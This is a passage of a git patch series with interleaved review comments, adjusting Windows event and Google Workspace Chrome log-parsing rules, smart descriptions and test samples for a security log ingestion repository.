"source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", "relationships": [ 
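Review bot: The two new `on {host.hostname}` entries (the `{user.name}` one and the `{user.domain}\\{user.name}` one) carry a `user.name` → `source.ip` relationship of type `reconnected from` even though `source.ip` is neither one of their conditions nor part of their description text, so a 4778 event with no source address still yields a relationship with an empty target — the NULL this commit sets out to avoid; drop that relationship from both entries so only `reconnected on session` remains. The three `{user.domain}\\{user.name}` variants also add no presence condition on `user.domain`, unlike the Sysmon entries added in the same commit, so a missing domain still renders as `\name`; add `{ "field": "user.domain" }` to each of them. Evaluation order is worth confirming: these less specific entries precede the pre-existing, most specific `on {host.hostname} from {source.ip}` entry, whereas the original file placed the `from {source.ip}` variant ahead of the plainer one, so if the engine takes the first match the full description will no longer be selected. Minor: `"field":"host.hostname"` lacks the space after the colon used everywhere else in the file. The enclosing JSON array starts and ends outside the hunk.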
@@ -793,6 +968,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" } ] }, 
@@ -969,6 +1147,191 @@ } ] }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + 
"target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, { "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", "relationships": [ @@ -1011,6 +1374,18 @@ { "field": "event.provider", "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, 
@@ -1148,6 +1523,57 @@
 },
 {
 "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}",
+ "conditions": [
+ {
+ "field": "winlog.provider_guid",
+ "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+ },
+ {
+ "field": "event.action",
+ "value": "Filtering Platform Connection"
+ },
+ {
+ "field": "winlog.event_data.SourceAddress"
+ },
+ {
+ "field": "winlog.event_data.DestAddress"
+ }
+ ]
+ },
+ {
+ "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}",
+ "conditions": [
+ {
+ "field": "winlog.provider_guid",
+ "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+ },
+ {
+ "field": "event.action",
+ "value": "Filtering Platform Connection"
+ },
+ {
+ "field": "winlog.event_data.SourceAddress"
+ }
+ ]
+ },
+ {
+ "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}",
+ "conditions": [
+ {
+ "field": "winlog.provider_guid",
+ "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+ },
+ {
+ "field": "event.action",
+ "value": "Filtering Platform Connection"
+ },
+ {
+ "field": "winlog.event_data.DestAddress"
+ }
+ ]
+ },
+ {
+ "value": "Filtering connection on {winlog.computer_name}",
 "conditions": [
 {
 "field": "winlog.provider_guid",
From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 14 Nov 2024 18:03:25 +0100
Subject: [PATCH 22/84] small fix
---
 Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index ee074adf6..b3a3257b7 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -16,6 +16,9 @@
 {
 "field": "event.provider",
 "value": "Microsoft-Windows-Security-Auditing"
+ },
+ {
+ "field": "action.properties.LogonType"
 }
 ]
 },
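Review bot: All four new `Filtering connection on {winlog.computer_name} ...` entries interpolate `winlog.computer_name` but none of them carries a `{ "field": "winlog.computer_name" }` presence condition — and the preceding commit removed exactly that condition from this entry — so an event without a computer name still renders the placeholder as NULL despite this commit's stated goal. Add `{ "field": "winlog.computer_name" }` to each of the four condition lists, or drop `on {winlog.computer_name}` from the texts. Here the most specific entry (both addresses) is placed first, while the Sysmon and 4778 entries added in the same commit are ordered least-specific first; whichever order the description engine expects, the file should use it consistently. The fourth entry's `conditions` list continues past the end of the hunk.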
@@ -42,6 +45,9 @@
 "field": "event.provider",
 "value": "Microsoft-Windows-Security-Auditing"
 },
+ {
+ "field": "action.properties.LogonType"
+ },
 {
 "field": "source.ip"
 }
From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 14 Nov 2024 18:10:35 +0100
Subject: [PATCH 23/84] change from event.provider to winlog.provider_name
---
 .../winlogbeat/_meta/smart-descriptions.json | 130 +++++++++---------
 1 file changed, 65 insertions(+), 65 deletions(-)
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index b3a3257b7..b720b4ffb 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -14,7 +14,7 @@
 "value": 4624
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 },
 {
@@ -42,7 +42,7 @@
 "value": 4624
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 },
 {
@@ -68,7 +68,7 @@
 "value": 4625
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 }
 ]
@@ -88,7 +88,7 @@
 "value": 4625
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 }
 ]
@@ -113,7 +113,7 @@
 "value": 4625
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 },
 {
@@ -136,7 +136,7 @@
 "value": 4634
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 }
 ]
@@ -156,7 +156,7 @@
 "value": 4648
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 }
 ]
@@ -176,7 +176,7 @@
 "value": 4648
 },
 {
- "field": "event.provider",
+ "field": "winlog.provider_name",
 "value": "Microsoft-Windows-Security-Auditing"
 },
 {
@@ -200,7 +200,7 @@ "value": 4662 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -220,7 +220,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -240,7 +240,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -285,7 +285,7 @@ "value": 4688 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -305,7 +305,7 @@ "value": 4689 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -325,7 +325,7 @@ "value": 4720 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -345,7 +345,7 @@ "value": 4722 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -365,7 +365,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -389,7 +389,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -413,7 +413,7 @@ "value": 4725 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -433,7 +433,7 @@ "value": 4726 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -453,7 +453,7 @@ "value": 4727 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -473,7 +473,7 @@ "value": 4742 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -493,7 +493,7 @@ "value": 4744 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -513,7 +513,7 @@ "value": 4750 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -533,7 +533,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -553,7 +553,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -577,7 +577,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -597,7 +597,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -621,7 +621,7 @@ "value": 4771 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -641,7 +641,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -665,7 +665,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -694,7 +694,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -722,7 +722,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { 
@@ -745,7 +745,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -770,7 +770,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -798,7 +798,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -821,7 +821,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -846,7 +846,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -872,7 +872,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -892,7 +892,7 @@ "value": 4798 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -912,7 +912,7 @@ "value": 4799 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -932,7 +932,7 @@ "value": 4825 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -952,7 +952,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -972,7 +972,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -995,7 +995,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -1015,7 +1015,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1039,7 +1039,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1059,7 +1059,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1083,7 +1083,7 @@ "value": 5156 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1096,7 +1096,7 @@ "value": 4103 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1109,7 +1109,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1122,7 +1122,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1135,7 +1135,7 @@ "value": 4105 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1148,7 +1148,7 @@ "value": 4106 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1183,7 +1183,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1224,7 +1224,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1278,7 +1278,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1327,7 +1327,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { 
@@ -1378,7 +1378,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1415,7 +1415,7 @@ "value": 2 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1435,7 +1435,7 @@ "value": 3 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1448,7 +1448,7 @@ "value": 11 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1465,7 +1465,7 @@ "value": "CreateValue" }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1478,7 +1478,7 @@ "value": 13 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1491,7 +1491,7 @@ "value": 16 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1504,7 +1504,7 @@ "value": 22 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:36:26 +0100 Subject: [PATCH 24/84] apply linter --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 0e522bee5..ded77dffa 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + google.report.saml.application_name: description: Saml SP application name name: google.report.saml.application_name From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:40:52 +0100 Subject: [PATCH 25/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 4cf8bb8e7..9e00ad24a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -215,6 +215,10 @@ }, { "field": "google.report.rule.type" + } + ] + }, + { "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", "conditions": [ { From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:44:32 +0100 Subject: [PATCH 26/84] Fix fields --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ded77dffa..21d6f4ee1 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + type: keyword google.report.saml.application_name: description: Saml SP application name From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 15 Nov 2024 12:03:00 +0100 Subject: [PATCH 27/84] test(Wallix): remove useless test --- Wallix/wallix-bastion/tests/rexec.json | 12 ------------ 1 file changed, 12 deletions(-) delete mode 100644 Wallix/wallix-bastion/tests/rexec.json diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 --- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null 
@@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:25:48 +0100 Subject: [PATCH 28/84] Add chrome service --- .../_meta/smart-descriptions.json | 57 +++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++++++ .../tests/test_chrome_sample_1.json | 47 +++++++++++++++ .../tests/test_chrome_sample_2.json | 45 +++++++++++++++ 4 files changed, 169 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6fa8c709a..0ac5acfe5 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -282,6 +282,63 @@ } ] }, + { + "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.id" + } + ] + }, + { + "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, + { + "value": "The user on device model {device.model.name} log in due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 3a0fce88f..c92e4bf32 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -30,6 +30,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_saml_fields filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
@@ -278,3 +280,21 @@ stages:
 event.type: ["denied"]
 event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
 filter: '{{ json_event.message.events[0].name == "login_failure"}}'
+
+ set_chrome_fields:
+ actions:
+ - set:
+ event.category: ["web"]
+ organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'
+
+ - set:
+ event.type: ["connection"]
+ filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}'
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
new file mode 100644
index 000000000..36c42d3d5
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json
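Review bot: The last `set` of the new `set_chrome_fields` stage classifies CHROME_OS_LOGIN_EVENT and CHROME_OS_LOGOUT_EVENT as `event.type: ["connection"]` under the stage-wide `event.category: ["web"]`, so ECS-keyed detection on `event.category:authentication` / `event.type:start` or `end` will not see ChromeOS session logins and logouts (the kiosk login in test_chrome_sample_2 is one). I would split that block per event and override the category there, keeping `web`/`change` only for the peripheral-status event; the rewritten blocks are below. Every mapping in this stage reads `events[0]` only, as the other stages in this file do, which deserves a one-line comment at the top of the stage such as `# only the first event of the activity record is mapped` so a multi-event record is not truncated without notice.
```yaml
  # … unchanged: first set (event.category "web", organization/device fields) and the peripheral-status set …
  - set:
      event.category: ["authentication", "session"]
      event.type: ["start"]
    filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGIN_EVENT"}}'

  - set:
      event.category: ["authentication", "session"]
      event.type: ["end"]
    filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGOUT_EVENT"}}'
```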
@@ -0,0 +1,47 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "id": "0x2", + "model": { + "identifier": "S5NXNZ00A000000", + "name": "2.0 root hub" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..49574fa28 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
